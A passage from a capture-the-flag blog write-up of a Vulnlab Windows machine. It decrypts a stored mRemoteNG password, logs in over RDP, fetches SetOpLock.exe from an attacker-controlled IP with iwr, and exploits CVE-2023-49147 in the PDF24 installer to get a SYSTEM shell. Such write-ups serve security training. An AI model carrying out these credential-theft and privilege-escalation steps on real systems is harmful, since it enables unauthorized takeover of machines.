class="string">&quot;AuthVNC&quot;</span> <span class="attr">VNCProxyType</span>=<span class="string">&quot;ProxyNone&quot;</span> <span class="attr">VNCProxyIP</span>=<span class="string">&quot;&quot;</span> <span class="attr">VNCProxyPort</span>=<span class="string">&quot;0&quot;</span> <span class="attr">VNCProxyUsername</span>=<span class="string">&quot;&quot;</span> <span class="attr">VNCProxyPassword</span>=<span class="string">&quot;&quot;</span> <span class="attr">VNCColors</span>=<span class="string">&quot;ColNormal&quot;</span> <span class="attr">VNCSmartSizeMode</span>=<span class="string">&quot;SmartSAspect&quot;</span> <span class="attr">VNCViewOnly</span>=<span class="string">&quot;false&quot;</span> <span class="attr">RDGatewayUsageMethod</span>=<span class="string">&quot;Never&quot;</span> <span class="attr">RDGatewayHostname</span>=<span class="string">&quot;&quot;</span> <span class="attr">RDGatewayUseConnectionCredentials</span>=<span class="string">&quot;Yes&quot;</span> <span class="attr">RDGatewayUsername</span>=<span class="string">&quot;&quot;</span> <span class="attr">RDGatewayPassword</span>=<span class="string">&quot;&quot;</span> <span class="attr">RDGatewayDomain</span>=<span class="string">&quot;&quot;</span> <span class="attr">InheritCacheBitmaps</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritColors</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritDescription</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritDisplayThemes</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritDisplayWallpaper</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritEnableFontSmoothing</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritEnableDesktopComposition</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritDomain</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritIcon</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritPanel</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritPassword</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritPort</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritProtocol</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritPuttySession</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRedirectDiskDrives</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRedirectKeys</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRedirectPorts</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRedirectPrinters</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRedirectSmartCards</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRedirectSound</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritSoundQuality</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritResolution</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritAutomaticResize</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritUseConsoleSession</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritUseCredSsp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRenderingEngine</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritUsername</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritICAEncryptionStrength</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDPAuthenticationLevel</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDPMinutesToIdleTimeout</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDPAlertIdleTimeout</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritLoadBalanceInfo</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritPreExtApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritPostExtApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritMacAddress</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritUserField</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritExtApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCCompression</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCEncoding</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCAuthMode</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCProxyType</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCProxyIP</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCProxyPort</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCProxyUsername</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCProxyPassword</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCColors</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCSmartSizeMode</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritVNCViewOnly</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDGatewayUsageMethod</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDGatewayHostname</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDGatewayUseConnectionCredentials</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDGatewayUsername</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDGatewayPassword</span>=<span class="string">&quot;false&quot;</span> <span class="attr">InheritRDGatewayDomain</span>=<span class="string">&quot;false&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">mrng:Connections</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>This is a <code>mRemoteNG</code> config file belonging to the <code>gale.dekarios</code> user. However, the password is encrypted. A quick google search for “mremoteng password decrypt” leads us to this tool <a target="_blank" rel="noopener" href="https://github.com/gquere/mRemoteNG_password_decrypt">https://github.com/gquere/mRemoteNG_password_decrypt</a> that decrypts mRemoteNG configuration files. Running it gives us the decrypted password:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  python3 mremoteng_decrypt.py config.xml</span><br><span class="line">Name: RDP/Gale</span><br><span class="line">Hostname: Lock</span><br><span class="line">Username: Gale.Dekarios</span><br><span class="line">Password: &lt;REDACTED&gt;</span><br></pre></td></tr></table></figure>
<p>Now that we have the password, we can try to RDP into the machine</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  xfreerdp /u:gale.dekarios /d:WORKGROUP /p:&#x27;&lt;REDACTED&gt;&#x27; /v:lock.vl /size:1280x720</span><br></pre></td></tr></table></figure>
<p>Indeed, we got an RDP session and can read the user flag :)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">C:\\Users\\gale.dekarios&gt;cd Desktop</span><br><span class="line"></span><br><span class="line">C:\\Users\\gale.dekarios\\Desktop&gt;type user.txt</span><br><span class="line">VL&#123;REDACTED&#125;</span><br></pre></td></tr></table></figure>
<h1 id="SYSTEM"><a href="#SYSTEM" class="headerlink" title="SYSTEM"></a>SYSTEM</h1><p>In <code>C:</code> drive, there is an interesting <code>_install</code> directory:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">C:\\&gt;cmd /c dir /A</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is A03D-9CEF</span><br><span class="line"></span><br><span class="line"> Directory of C:\\</span><br><span class="line"></span><br><span class="line">12/28/2023  06:17 AM    &lt;DIR&gt;          $Recycle.Bin</span><br><span class="line">12/27/2023  12:38 PM    &lt;DIR&gt;          $WinREAgent</span><br><span class="line">01/19/2024  04:56 AM    &lt;DIR&gt;          Config.Msi</span><br><span class="line">12/27/2023  06:14 PM    &lt;JUNCTION&gt;     Documents and Settings [C:\\Users]</span><br><span class="line">01/19/2024  04:36 AM            12,288 DumpStack.log.tmp</span><br><span class="line">12/27/2023  11:11 AM    &lt;DIR&gt;          Gitea</span><br><span class="line">12/27/2023  10:27 AM    &lt;DIR&gt;          inetpub</span><br><span class="line">01/19/2024  05:47 AM    &lt;DIR&gt;          Microsoft</span><br><span class="line">01/19/2024  04:36 AM     1,207,959,552 pagefile.sys</span><br><span class="line">05/08/2021  12:20 AM    &lt;DIR&gt;          PerfLogs</span><br><span class="line">12/28/2023  11:28 AM    &lt;DIR&gt;          Program Files</span><br><span class="line">12/28/2023  11:24 AM    &lt;DIR&gt;          Program Files (x86)</span><br><span class="line">12/28/2023  11:24 AM    &lt;DIR&gt;          ProgramData</span><br><span class="line">12/27/2023  06:14 PM    &lt;DIR&gt;          Recovery</span><br><span class="line">12/27/2023  06:14 PM    &lt;DIR&gt;          System Volume Information</span><br><span class="line">01/19/2024  04:39 AM    &lt;DIR&gt;          temp</span><br><span class="line">12/28/2023  06:14 AM    &lt;DIR&gt;          Users</span><br><span class="line">12/28/2023  11:18 AM    &lt;DIR&gt;          Windows</span><br><span class="line">12/28/2023  11:23 AM    &lt;DIR&gt;          _install</span><br><span class="line">               2 File(s)  1,207,971,840 bytes</span><br><span class="line">              17 Dir(s)   5,546,426,368 bytes free</span><br></pre></td></tr></table></figure>
<p>It contains some software installer files:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">C:\\&gt;cd _install</span><br><span class="line"></span><br><span class="line">C:\\_install&gt;dir</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is A03D-9CEF</span><br><span class="line"></span><br><span class="line"> Directory of C:\\_install</span><br><span class="line"></span><br><span class="line">12/28/2023  11:21 AM        60,804,608 Firefox Setup 121.0.msi</span><br><span class="line">12/28/2023  05:39 AM        43,593,728 mRemoteNG-Installer-1.76.20.24615.msi</span><br><span class="line">12/14/2023  10:07 AM       462,602,240 pdf24-creator-11.15.1-x64.msi</span><br><span class="line">               3 File(s)    567,000,576 bytes</span><br><span class="line">               0 Dir(s)   5,546,401,792 bytes free</span><br></pre></td></tr></table></figure>
<p>The <code>pdf24-creator-11.15.1-x64.msi</code> is intriguing. Googling “pdf24-creator-11.15.1 exploit” brings up a blogpost (<a target="_blank" rel="noopener" href="https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/">https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/</a>) about a privilege escalation vulnerability (CVE-2023-49147) with a proof-of-concept (PoC). Basically, we can run the following command to start the repair of <em>PDF24 Creator</em> and trigger the vulnerable actions without a UAC popup:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msiexec.exe /fa C:\\_install\\pdf24-creator-11.15.1-x64.msi</span><br></pre></td></tr></table></figure>
<p>The installer should start. Now, we need to set an oplock on the <code>faxPrnInst.log</code> file as soon as it gets read. We can do that using the <code>SetOpLock.exe</code> tool from <a target="_blank" rel="noopener" href="https://github.com/googleprojectzero/symboliclink-testing-tools">https://github.com/googleprojectzero/symboliclink-testing-tools</a>. First let’s transfer it to the victim machine</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PS C:\\temp&gt; iwr &lt;http://10.8.0.210/SetOpLock.exe&gt; -outfile SetOpLock.exe</span><br><span class="line">PS C:\\temp&gt; ls</span><br><span class="line"></span><br><span class="line">    Directory: C:\\temp</span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">-a----         1/19/2024   6:06 AM         116224 SetOpLock.exe</span><br></pre></td></tr></table></figure>
<p>Then we execute it like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\\temp\\SetOpLock.exe &quot;C:\\Program Files\\PDF24\\faxPrnInst.log&quot; r</span><br></pre></td></tr></table></figure>
<p>As per the blogpost, if the opis set, the cmd window that opens when pdf24-PrinterInstall.exe is executed doesn’t close:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PS C:\\temp&gt; C:\\temp\\SetOpLock.exe &quot;C:\\Program Files\\PDF24\\faxPrnInst.log&quot; r</span><br><span class="line">OpLock triggered, hit ENTER to close oplock</span><br></pre></td></tr></table></figure>
<p>At this point, we need to follow these steps to spawn a SYSTEM shell:</p>
<ul>
<li>right click on the top bar of the cmd window.</li>
<li>click on properties.</li>
<li>under options click on the “legacy console mode” link.</li>
<li>open the link with Firefox (it should open a link like this “<a target="_blank" rel="noopener" href="https://go.microsoft.com/fwlink/?LinkId=871150">https://go.microsoft.com/fwlink/?LinkId=871150</a>“).</li>
<li>in the opened browser window press the key combination <code>CTRL+o</code>.</li>
<li>type “cmd.exe” in the top bar and press Enter.</li>
</ul>
<p>If all the steps are executed successfully, we should get a SYSTEM shell:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">C:\\Windows&gt;whoami</span><br><span class="line">nt authority\\system</span><br><span class="line"></span><br><span class="line">C:\\Windows&gt;type C:\\Users\\Administrator\\Desktop\\root.txt</span><br><span class="line">VL&#123;REDACTED&#125;</span><br></pre></td></tr></table></figure>
<p>That concludes the box. I hope you learned something new 🐈</p>
</article><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/vulnlab/">vulnlab</a></div><div class="post_share"></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/" title="NetExec Cheatsheet"><img class="cover" src="https://repository-images.githubusercontent.com/689013903/3d0fa9de-9232-4caa-9a01-a80ebca9dc9c" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">NetExec Cheatsheet</div></div></a></div><div class="next-post pull-right"><a href="/2023/12/14/Bamboo-Vulnlab/" title="Bamboo - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2F32f31a6a-94e8-4f0c-a634-b4d25ddb3468%2Fbamboo_slide.webp?table=block&amp;id=4a0a5659-6394-4650-b233-d1910b3f33f8&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=1030&amp;userId=&amp;cache=v2" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">Bamboo - Vulnlab</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2023/12/14/Bamboo-Vulnlab/" title="Bamboo - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2F32f31a6a-94e8-4f0c-a634-b4d25ddb3468%2Fbamboo_slide.webp?table=block&id=4a0a5659-6394-4650-b233-d1910b3f33f8&spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&width=1030&userId=&cache=v2" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-12-14</div><div class="title">Bamboo - Vulnlab</div></div></a></div><div><a href="/2024/05/28/Escape-Vulnlab/" title="Escape - Vulnlab"><img class="cover" src="https://wiki.vulnlab.com/~gitbook/image?url=https%3A%2F%2F3528174365-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FI3I73FFqB6GvT8N5Mt1N%252Fuploads%252Ft12lXmil2VV0iVqncZnv%252Fescape_slide.png%3Falt%3Dmedia%26token%3Dce1f8941-c579-4d9a-bb57-ea6de1e5252b&width=768&dpr=1&quality=100&sign=642a654e4f3d5c89f5bd79724228f6521b285446f0055d8b5050aced207fd1f8" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-05-28</div><div class="title">Escape - Vulnlab</div></div></a></div><div><a href="/2023/10/25/Job-Vulnlab/" title="Job - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2Fdf7a8010-c06f-4ab7-b4ca-840c76b90893%2FUntitled.png?table=block&id=4eee05c7-64ed-409d-9fab-63f5a6e430ba&spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&width=1020&userId=&cache=v2" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-10-25</div><div class="title">Job - Vulnlab</div></div></a></div><div><a href="/2023/10/19/Media-Vulnlab/" title="Media - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2F723ecb50-3ce1-43a7-8202-b53f76aa2ccf%2Fmedia.png?table=block&id=965e07b3-adbf-4f84-b843-97ecaafe658a&spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&width=1020&userId=&cache=v2" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-10-19</div><div class="title">Media - Vulnlab</div></div></a></div><div><a href="/2024/11/24/Redelegate-Vulnlab/" title="Redelegate - Vulnlab"><img class="cover" src="https://assets.vulnlab.com/redelegate_slide.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-24</div><div class="title">Redelegate - Vulnlab</div></div></a></div><div><a href="/2024/08/18/Reflection-Vulnlab/" title="Reflection - Vulnlab"><img class="cover" src="https://assets.vulnlab.com/reflection_slide.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-08-18</div><div class="title">Reflection - Vulnlab</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/cat.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">serioton</div><div class="author-info__description">cat</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">31</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">10</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">3</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://twitter.com/seriotonctf"><i class="fab fa-twitter"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/seriotonctf" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="https://twitter.com/seriotonctf" target="_blank" title="Twitter"><i class="fab fa-twitter"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#NMAP"><span class="toc-text">NMAP</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WEB"><span class="toc-text">WEB</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GITEA"><span class="toc-text">GITEA</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Shell-as-ellen-freeman"><span class="toc-text">Shell as ellen.freeman</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ellen-freeman-to-gale-dekarios"><span class="toc-text">ellen.freeman to gale.dekarios</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SYSTEM"><span class="toc-text">SYSTEM</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2025/01/31/Abusing-Unconstrained-Delegation/" title="Abusing Unconstrained Delegation"><img src="https://serioton.notion.site/image/attachment%3A0bf0667e-6ae0-45c4-8872-2e681305a82c%3Acat.png?table=block&amp;id=18cd3b99-8509-805b-8ac7-f5241d4b2083&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=1420&amp;userId=&amp;cache=v2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Abusing Unconstrained Delegation"/></a><div class="content"><a class="title" href="/2025/01/31/Abusing-Unconstrained-Delegation/" title="Abusing Unconstrained Delegation">Abusing Unconstrained Delegation</a><time datetime="2025-01-31T17:58:46.000Z" title="Created 2025-01-31 17:58:46">2025-01-31</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/12/01/BloodyAD-Cheatsheet/" title="BloodyAD Cheatsheet"><img src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2Febc8dc6e-40a9-492f-839f-b175138faa93%2Fcat.png?table=block&amp;id=14fd3b99-8509-80fd-bbe8-daf204d95fcc&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=2000&amp;userId=&amp;cache=v2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="BloodyAD Cheatsheet"/></a><div class="content"><a class="title" href="/2024/12/01/BloodyAD-Cheatsheet/" title="BloodyAD Cheatsheet">BloodyAD Cheatsheet</a><time datetime="2024-12-01T20:16:14.000Z" title="Created 2024-12-01 20:16:14">2024-12-01</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/24/Redelegate-Vulnlab/" title="Redelegate - Vulnlab"><img src="https://assets.vulnlab.com/redelegate_slide.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Redelegate - Vulnlab"/></a><div class="content"><a class="title" href="/2024/11/24/Redelegate-Vulnlab/" title="Redelegate - Vulnlab">Redelegate - Vulnlab</a><time datetime="2024-11-24T16:47:11.000Z" title="Created 2024-11-24 16:47:11">2024-11-24</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/19/AD-ACLs-Cheatsheet/" title="AD ACLs Cheatsheet"><img src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2Ff66ee8a6-26a3-4033-891f-0379a8820600%2Fcat.png?table=block&amp;id=143d3b99-8509-8000-b976-d5c681cab379&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=1420&amp;userId=&amp;cache=v2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="AD ACLs Cheatsheet"/></a><div class="content"><a class="title" href="/2024/11/19/AD-ACLs-Cheatsheet/" title="AD ACLs Cheatsheet">AD ACLs Cheatsheet</a><time datetime="2024-11-19T18:47:00.000Z" title="Created 2024-11-19 18:47:00">2024-11-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/08/25/Retro2-Vulnlab/" title="Retro2 - Vulnlab"><img src="https://assets.vulnlab.com/retro2_slide.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Retro2 - Vulnlab"/></a><div class="content"><a class="title" href="/2024/08/25/Retro2-Vulnlab/" title="Retro2 - Vulnlab">Retro2 - Vulnlab</a><time datetime="2024-08-25T18:53:34.000Z" title="Created 2024-08-25 18:53:34">2024-08-25</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/train_travel.jpg')"><div id="footer-wrap"><div class="copyright">&copy;2023 - 2025 By serioton</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">ฅ^•ﻌ•^ฅ</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between single-column and double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">Search</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  Loading the Database</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"></div></div></body></html>